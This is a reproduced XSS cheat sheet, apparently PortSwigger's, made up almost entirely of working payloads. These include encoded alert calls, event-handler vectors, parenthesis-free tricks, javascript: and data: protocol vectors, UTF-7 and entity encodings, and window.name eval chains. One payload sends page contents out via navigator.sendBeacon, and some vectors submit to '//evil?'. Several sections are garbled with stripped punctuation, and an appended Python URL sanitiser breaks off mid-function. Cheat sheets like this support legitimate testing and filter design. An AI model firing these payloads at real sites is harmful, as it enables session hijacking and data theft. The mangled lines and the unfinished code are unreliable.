XSS into a JavaScript string, hex escape sequence (this): this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (top): top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (parent): parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (frames): frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (globalThis): globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence and base64 encoded string (window): window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (self): self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (this): this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (top): top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent): parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames): frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis): globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, octal escape sequence (window): window['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (self): self['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (this): this['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (top): top['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (parent): parent['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (frames): frames['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (globalThis): globalThis['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, unicode escape (window): window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (self): self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (this): this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (top): top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (parent): parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (frames): frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (globalThis): globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, RegExp source property (window): window[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (self): self[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (this): this[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (top): top[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (parent): parent[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (frames): frames[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (globalThis): globalThis[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, Hieroglyphy/JSFuck (window): window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (self): self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (this): this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (top): top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (parent): parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (frames): frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis): globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

Impossible labs

Title, Description, Length limit, Closest vector (each lab links to a live page on the original site)

Basic context, WAF blocks <[a-zA-Z]: This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag. Length limit: N/A. Closest vector: N/A.

Script based injection but quotes, forward slash and backslash are escaped: We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points, the first within a script based context and the second in HTML. Length limit: N/A. Closest vector: N/A.

innerHTML context but no equals allowed: You have a site that processes the query string and URL decodes the parameters, but splits on the equals sign and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event. Length limit: N/A. Closest vector: N/A.

Basic context, length limit: This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it? Length limit: 15. Closest vector: <q oncut=alert``

Attribute context, length limit: The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, "oncut=alert``+ (the plus is a trailing space). Do you think you can beat it? Length limit: 14. Closest vector: "oncut=alert`` (with a trailing space)

Basic context, length limit, arbitrary code: It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. Length limit: 19. Closest vector: <q/oncut=eval(name)

Attribute context, length limit, arbitrary code: Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript. Length limit: 17. Closest vector: see link.

Injection occurs inside a frameset but before the body: We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. Length limit: N/A. Closest vector: N/A.

Injection occurs inside a single quoted string, only the characters a-z0-9+` are allowed: The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. Length limit: N/A. Closest vector: N/A.

Classic vectors (XSS crypt)

Image src with JavaScript protocol: <img src="javascript:alert(1)">

Body background with JavaScript protocol: <body background="javascript:alert(1)">

Iframe data URLs no longer work as modern browsers use a null origin:

<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

VBScript protocol used to work in IE: <a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>

JScript compact was a minimal version of JS that wasn't widely used in IE:

<a href="#" onclick="jscript.compact:alert(1)">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1)">test</a>

JScript.Encode allows encoded JavaScript: <a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>

VBScript.Encode allows encoded VBScript: <iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@"> <iframe language=VBScript.Encode onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">

JavaScript entities used to work in Netscape Navigator:

<a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator:

<link href="xss.js" rel=stylesheet type="text/javascript">

Button used to consume markup: <form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup:

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL, Firefox only <= 2: <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">

XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt

CSS expressions, <= IE7: <div style="xss:expression(alert(1))"> <div style="xss:expression(1)-alert(1)"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio\006e(alert(1))"> <div style="xss:expressio\00006e(alert(1))"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio&#x5c;6e(alert(1))">

In quirks mode IE allowed you to use = instead of : : <div style="xss=expression(alert(1))"> <div style="color&#x3d;red">test</div>

Behaviors for older modes of IE: <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions:

<script> function window.onload(){ alert(1) } </script>
<script> function window::onload(){ alert(1) } </script>
<script> function window.location(){ } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> </body>

<script> function document.body.innerHTML(){ x = '<img src=1 onerror=alert(1)>' } </script> </body>

GreyMagic HTML+time exploit (no longer works even in 5 docmode):

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt

Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt

Firefox allows NULL characters inside openingcomments

lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt

Safari used to allow any tag to have an onload event inside SVG:

<svg><xss onload=alert(1)>

Isindex using src attribute: <isindex type=image src="//evil?

Isindex using submit: <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?

Isindex and formaction: <isindex type=submit formaction=javascript:alert(1)>

Isindex and action: <isindex type=submit action=javascript:alert(1)>

Credits: Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.


Event handlers that do require user interaction

Event: Description: Code

onauxclick: Fires when right clicking or using the middle button of the mouse: <input onauxclick=alert(1)>

onbeforecopy: Requires you copy a piece of text: <a onbeforecopy="alert(1)" contenteditable>test</a>

onbeforecut: Requires you cut a piece of text: <a onbeforecut="alert(1)" contenteditable>test</a>

onbeforepaste: Requires you paste a piece of text: <a onbeforepaste="alert(1)" contenteditable>test</a>

onchange: Requires a change of value: <input onchange=alert(1) value=xss>

onclick: Requires a click of the element: <xss onclick="alert(1)">test</xss>

onclose: Fires when a dialog is closed: <dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>

oncontextmenu: Triggered when right clicking to show the context menu: <xss oncontextmenu="alert(1)">test</xss>

oncopy: Requires you copy a piece of text: <xss oncopy=alert(1) value="XSS" autofocus tabindex=1>test

oncut: Requires you cut a piece of text: <xss oncut=alert(1) value="XSS" autofocus tabindex=1>test

ondblclick: Triggered when double clicking the element: <xss ondblclick="alert(1)" autofocus tabindex=1>test</xss>

ondrag: Triggered when dragging the element: <xss draggable="true" ondrag="alert(1)">test</xss>

ondragend: Triggered when dragging of the element is finished: <xss draggable="true" ondragend="alert(1)">test</xss>

ondragenter: Requires a mouse drag: <xss draggable="true" ondragenter="alert(1)">test</xss>

ondragleave: Requires a mouse drag: <xss draggable="true" ondragleave="alert(1)">test</xss>

ondragover: Triggered when dragging over an element: <div draggable="true" contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>

ondragstart: Requires a mouse drag: <xss draggable="true" ondragstart="alert(1)">test</xss>

ondrop: Triggered when dropping a draggable element: <div draggable="true" contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>

onfullscreenchange: Fires when a video changes full screen status: <video onfullscreenchange=alert(1) src="validvideo.mp4" controls>

oninput: Requires a change of value: <input oninput=alert(1) value=xss>

oninvalid: Requires a form submission with an element that does not satisfy its constraints, such as a required attribute: <form><input oninvalid=alert(1) required><input type=submit>

onkeydown: Triggered when a key is pressed: <xss onkeydown="alert(1)" contenteditable>test</xss>

onkeypress: Triggered when a key is pressed: <xss onkeypress="alert(1)" contenteditable>test</xss>

onkeyup: Triggered when a key is released: <xss onkeyup="alert(1)" contenteditable>test</xss>

onmousedown: Triggered when the mouse is pressed: <xss onmousedown="alert(1)">test</xss>

onmouseenter: Triggered when the mouse is hovered over the element: <xss onmouseenter="alert(1)">test</xss>

onmouseleave: Triggered when the mouse is moved away from the element: <xss onmouseleave="alert(1)">test</xss>

onmousemove: Requires mouse movement: <xss onmousemove="alert(1)">test</xss>

onmouseout: Triggered when the mouse is moved away from the element: <xss onmouseout="alert(1)">test</xss>

onmouseover: Requires a hover over the element: <xss onmouseover="alert(1)">test</xss>

onmouseup: Triggered when the mouse button is released: <xss onmouseup="alert(1)">test</xss>

onmousewheel: Fires when the mousewheel scrolls: <xss onmousewheel="alert(1)">requires scrolling

onmozfullscreenchange: Fires when a video changes full screen status: <video onmozfullscreenchange=alert(1) src="validvideo.mp4" controls>

onpagehide: Fires when the page is changed: <body onpagehide=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>

onpaste: Requires you paste a piece of text: <a onpaste="alert(1)" contenteditable>test</a>

onpause: Requires clicking the element to pause: <audio autoplay controls onpause="alert(1)"><source src="validaudio.wav" type="audio/wav"></audio>

onpointerdown: Fires when the pointer is pressed down: <xss onpointerdown=alert(1)>XSS</xss>

onpointerenter: Fires when the pointer enters the element: <xss onpointerenter=alert(1)>XSS</xss>

onpointerleave: Fires when the pointer leaves the element: <xss onpointerleave=alert(1)>XSS</xss>

onpointermove: Fires when the pointer moves: <xss onpointermove=alert(1)>XSS</xss>

onpointerout: Fires when the pointer moves out of the element: <xss onpointerout=alert(1)>XSS</xss>

onpointerover: Fires when the pointer moves over the element: <xss onpointerover=alert(1)>XSS</xss>

onpointerrawupdate: Fires when the pointer changes: <xss onpointerrawupdate=alert(1)>XSS</xss>

onpointerup: Fires when the pointer is released: <xss onpointerup=alert(1)>XSS</xss>

onreset: Requires a click: <form onreset=alert(1)><input type=reset>

onsearch: Fires when a form is submitted and the input has a type attribute of search: <form><input type=search onsearch=alert(1) value="Hit return" autofocus>

onseeked: Requires clicking the element timeline: <audio autoplay controls onseeked="alert(1)"><source src="validaudio.wav" type="audio/wav"></audio>

onseeking: Requires clicking the element timeline: <audio autoplay controls onseeking="alert(1)"><source src="validaudio.wav" type="audio/wav"></audio>

onselect: Requires you select text: <input onselect=alert(1) value="XSS" autofocus>

onselectionchange: Fires when text selection is changed on the page: <body onselectionchange=alert(1)>select some text

onselectstart

Fires when beginning a text selection ltbody onselectstart=alert(1)gtselect some textCompatibility

onshow

Fires context menu is shown ltdiv contextmenu=xssgtltpgtRight clickltmenu type=context id=xss onshow=alert(1)gtltmenugtltdivgt

Compatibility

onsubmit

Requires a form submission ltform onsubmit=alert(1)gtltinput type=submitgtCompatibility

ontouchend

Fires when the touch screen only mobiledevice

ltbody ontouchend=alert(1)gt Compatibility

ontouchmove

Fires when the touch screen and moveonly mobile device

ltbody ontouchmove=alert(1)gt Compatibility

ontouchstart

Fires when the touch screen only mobiledevice

ltbody ontouchstart=alert(1)gt Compatibility

onvolumechange

Requires volume adjustment ltaudio autoplay controls onvolumechange=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onwheel

Fires when you use the mouse wheel ltbody onwheel=alert(1)gtCompatibility

Restricted characters

No parentheses using exception handling
<script>onerror=alert;throw 1</script>

No parentheses using exception handling, no semicolons
<script>{onerror=alert}throw 1</script>

No parentheses using exception handling, no semicolons, using expressions
<script>throw onerror=alert,1</script>

No parentheses using exception handling and eval
<script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses using exception handling and eval on Firefox
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>

No parentheses using ES6 hasInstance and instanceof with eval
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

No parentheses using ES6 hasInstance and instanceof with eval, without a dot
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

No parentheses using location redirect
<script>location='javascript:alert\x281\x29'</script>

No parentheses using location redirect, no strings
<script>location=name</script>

No parentheses using template strings
<script>alert`1`</script>

No parentheses using template strings and location hash
<script>new Function`X${document.location.hash.substr`1`}`</script>

No parentheses or spaces using template strings and location hash
<script>Function`X${document.location.hash.substr`1`}```</script>

Frameworks

Bootstrap onanimationstart event
<xss class="progress-bar-animated" onanimationstart="alert(1)">

Bootstrap ontransitionend event
<xss class="carousel slide" data-ride="carousel" data-interval="100" ontransitionend="alert(1)"><xss class="carousel-inner"><xss class="carousel-item active"></xss><xss class="carousel-item"></xss></xss></xss>

Protocols

Iframe src attribute with JavaScript protocol
<iframe src="javascript:alert(1)">

Object data attribute with JavaScript protocol
<object data="javascript:alert(1)">

Embed src attribute with JavaScript protocol
<embed src="javascript:alert(1)">

A standard JavaScript protocol
<a href="javascript:alert(1)">XSS</a>

The protocol is not case sensitive
<a href="JaVaScript:alert(1)">XSS</a>

Characters \x01-\x20 are allowed before the protocol
<a href=" javascript:alert(1)">XSS</a>

Characters \x09, \x0a, \x0d are allowed inside the protocol (shown with a literal tab)
<a href="javas	cript:alert(1)">XSS</a>

Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon (shown with a literal tab)
<a href="javascript	:alert(1)">XSS</a>

Xlink namespace inside SVG with JavaScript protocol
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

SVG animate tag using values
<svg><animate xlink:href="#xss" attributeName="href" values="javascript:alert(1)" /><a id="xss"><text x="20" y="20">XSS</text></a>

SVG animate tag using to
<svg><animate xlink:href="#xss" attributeName="href" from="javascript:alert(1)" to="1" /><a id="xss"><text x="20" y="20">XSS</text></a>

SVG set tag
<svg><set xlink:href="#xss" attributeName="href" from="?" to="javascript:alert(1)" /><a id="xss"><text x="20" y="20">XSS</text></a>

Data protocol inside script src
<script src="data:text/javascript,alert(1)"></script>

SVG script href attribute without closing script tag
<svg><script href="data:text/javascript,alert(1)" />

SVG use element (Chrome/Firefox)
<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'&gt;&lt;a xlink:href='javascript:alert(1)'&gt;&lt;rect x='0' y='0' width='100' height='100' /&gt;&lt;/a&gt;&lt;/svg&gt;#x"></use></svg>

Import statement with data URL
<script>import('data:text/javascript,alert(1)')</script>

Base tag with JavaScript protocol rewriting relative URLs
<base href="javascript:/a/-alert(1)///////"><a href="../lol/safari.html">test</a>

MathML makes any tag clickable
<math><x href="javascript:alert(1)">blah

Button and formaction
<form><button formaction="javascript:alert(1)">XSS

Input and formaction
<form><input type="submit" formaction="javascript:alert(1)" value="XSS">

Form and action
<form action="javascript:alert(1)"><input type="submit" value="XSS">

Use element with an external URL
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>

Animate tag with keytimes and multiple values
<svg><animate xlink:href="#xss" attributeName="href" dur="5s" repeatCount="indefinite" keytimes="0;0;1" values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id="xss"><text x="20" y="20">XSS</text></a>

Other useful attributes

Using srcdoc attribute
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>

Click a submit element from anywhere on the page, even outside the form
<form action="javascript:alert(1)"><input type="submit" id="x"></form><label for="x">XSS</label>

Hidden inputs: access key attributes can enable XSS on normally unexploitable elements
<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Link elements: access key attributes can enable XSS on normally unexploitable elements
<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Download attribute can save a copy of the current webpage
<a href="#" download="filename.html">Test</a>

Disable referrer using referrerpolicy
<img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Set window.name via parameter on the window.open function
<a href="#" onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//','alert(1)')">XSS</a>

Set window.name via name attribute in an <iframe> tag
<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//"></iframe>

Set window.name via target attribute in a <base> tag
<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//">XSS via target in base tag</a>

Set window.name via target attribute in an <a> tag
<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//">XSS via target in a tag</a>

Set window.name via usemap attribute in an <img> tag
<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//"></map>

Set window.name via target attribute in a <form> tag
<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type="hidden" name="x" value="';eval(name);//"><input type="hidden" name="context" value="js_string_single"><input type="submit" value="XSS via target in a form"></form>

Set window.name via formtarget attribute in an <input> tag of type submit
<form><input type="hidden" name="x" value="';eval(name);//"><input type="hidden" name="context" value="js_string_single"><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>

Set window.name via formtarget attribute in an <input> tag of type image
<form><input type="hidden" name="x" value="';eval(name);//"><input type="hidden" name="context" value="js_string_single"><input name="1" type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>

Special tags

Redirect to a different domain
<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Meta charset attribute UTF-7
<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta charset UTF-7 via http-equiv
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 1
+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 2
+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 3
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 4
+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Upgrade insecure requests
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

Disable JavaScript via iframe sandbox
<iframe sandbox src="//portswigger-labs.net"></iframe>

Disable referrer
<meta name="referrer" content="no-referrer">

Encoding

Overlong UTF-8 (each sequence is an overlong encoding of the < character)
\xC0\xBCscript>alert(1)</script> \xE0\x80\xBCscript>alert(1)</script> \xF0\x80\x80\xBCscript>alert(1)</script> \xF8\x80\x80\x80\xBCscript>alert(1)</script> \xFC\x80\x80\x80\x80\xBCscript>alert(1)</script>

Unicode escapes
<script>\u0061lert(1)</script>

Unicode escapes ES6 style
<script>\u{61}lert(1)</script>

Unicode escapes ES6 style, zero padded
<script>\u{0000000061}lert(1)</script>

Hex encoding JavaScript escapes
<script>eval('\x61lert(1)')</script>

Octal encoding
<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>

Decimal encoding with optional semi-colon
<a href="&#106avascript:alert(1)">XSS</a> <a href="&#106;avascript:alert(1)">XSS</a>

SVG script with HTML encoding
<svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>

Decimal encoding with padded zeros
<a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding entities
<a href="&#x6a;avascript:alert(1)">XSS</a>

Hex encoding without semi-colon, provided the next character is not a-f0-9
<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>

Hex encoding with padded zeros
<a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive
<a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities
<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>

URL encoding
<a href="javascript:x='%27-alert(1)-%27'">XSS</a>

HTML entities and URL encoding
<a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
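The parsing rules behind the Protocols and Encoding rows (whitespace \x01-\x20 before the scheme, \x09/\x0a/\x0d stripped inside it, numeric character references with optional semicolon, zero padding and an upper-case X, named references such as &colon; and &Tab;) are exactly what a server-side URL check has to reproduce before it compares the scheme. The following is an added example, not code from the PortSwigger cheat sheet: a normaliser that applies those rules and then enforces a scheme allowlist (the ALLOWED_SCHEMES policy is a hypothetical choice for this example), measured against href values taken from the tables above.

```python
import html
import re
from typing import Dict, List, Optional

# Control characters and space that a browser strips from the start of a URL
# (the row "Characters \x01-\x20 are allowed before the protocol").
_LEADING_JUNK = re.compile(r"^[\x00-\x20]+")
# Tab, LF and CR are dropped from anywhere in the URL during URL parsing
# (the rows on \x09, \x0a, \x0d inside the protocol and before the colon).
_STRIPPED_INSIDE = re.compile(r"[\x09\x0a\x0d]")
# RFC 3986 scheme: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) followed by ":".
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")

# Schemes the sanitiser permits in href/src. Hypothetical policy for this example.
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def decode_attribute(value: str) -> str:
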